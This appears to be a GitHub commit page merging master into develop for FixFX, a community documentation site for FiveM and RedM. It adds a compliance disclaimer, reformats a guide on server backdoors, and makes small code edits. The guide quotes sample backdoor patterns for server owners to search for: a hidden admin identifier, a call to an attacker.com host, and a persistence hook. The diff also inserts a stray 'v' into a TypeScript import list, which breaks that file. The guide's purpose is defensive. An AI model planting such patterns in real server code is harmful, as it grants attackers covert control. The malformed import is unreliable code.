Skip to content

Commit 8580921

Browse files
authored
Merge branch 'master' into develop
2 parents 3898ba9 + 69202f7 commit 8580921

4 files changed

Lines changed: 7 additions & 3 deletions

File tree

app/layout.config.tsx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ import {
1212
Server,
1313
Palette,
1414
Braces,
15-
MessageCircle,
15+
v MessageCircle,
1616
} from "lucide-react";
1717

1818
export const baseOptions: HomeLayoutProps = {

content/docs/core/disclaimer.mdx

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -37,6 +37,10 @@ FixFX is an independent documentation hub created by the community for the commu
3737

3838
FixFX aims to provide accessible and comprehensive documentation for the CitizenFX ecosystem, including FiveM and RedM. It is a community-driven resource designed to help users navigate the platform effectively.
3939

40+
## Compliance & API Usage
41+
42+
Any CFX services, APIs, or data endpoints utilized in the construction or maintenance of these documents are accessed **legally and in full accordance** with their respective terms of service and usage standards. FixFX strictly adheres to all established rate limits and technical guidelines to ensure respectful and sustainable interaction with official infrastructure.
43+
4044
## Use of Trademarks
4145

4246
All trademarks, logos, and brand names used on this site are the property of their respective owners. Their use does not imply any affiliation or endorsement by these entities.

content/docs/guides/common-threats.mdx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -189,7 +189,7 @@ Once you've identified a backdoor, thorough removal is critical because backdoor
189189
title: "Identify All Backdoor Components",
190190
description:
191191
"Don't just remove one suspicious resource or file. Backdoors are typically multi-layered. A single malicious resource might create database accounts, add hidden admin users, and place files in multiple locations. Finding one component should trigger a comprehensive search for others.",
192-
code: "-- Common backdoor patterns to search for:\n-- Hidden identifiers that grant permissions\nif identifier == 'hidden-admin-identifier' then\n grantAdmin(source)\nend\n\n-- External communication\nHttpsRequest({url = 'http://attacker.com/...'})\n\n-- Resource restart immunity\nAddEventHandler('onServerResourceStart', function()\n -- Persistence code\nend)",
192+
code: "-- Common backdoor patterns to search for:\n\n-- Hidden identifiers that grant permissions\n\nif identifier == 'hidden-admin-identifier' then\n\ngrantAdmin(source)\nend\n\n\n-- External communication\n\nHttpsRequest({url = 'http://attacker.com/...'})\n\n\n-- Resource restart immunity\n\nAddEventHandler('onServerResourceStart', function()\n\n -- Persistence code\nend)",
193193
},
194194
{
195195
title: "Remove the Backdoor",

packages/ui/src/core/validator/validator-content.tsx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -185,4 +185,4 @@ export function ValidatorContent() {
185185
</main>
186186
</div>
187187
);
188-
}
188+
}

0 commit comments

Comments
 (0)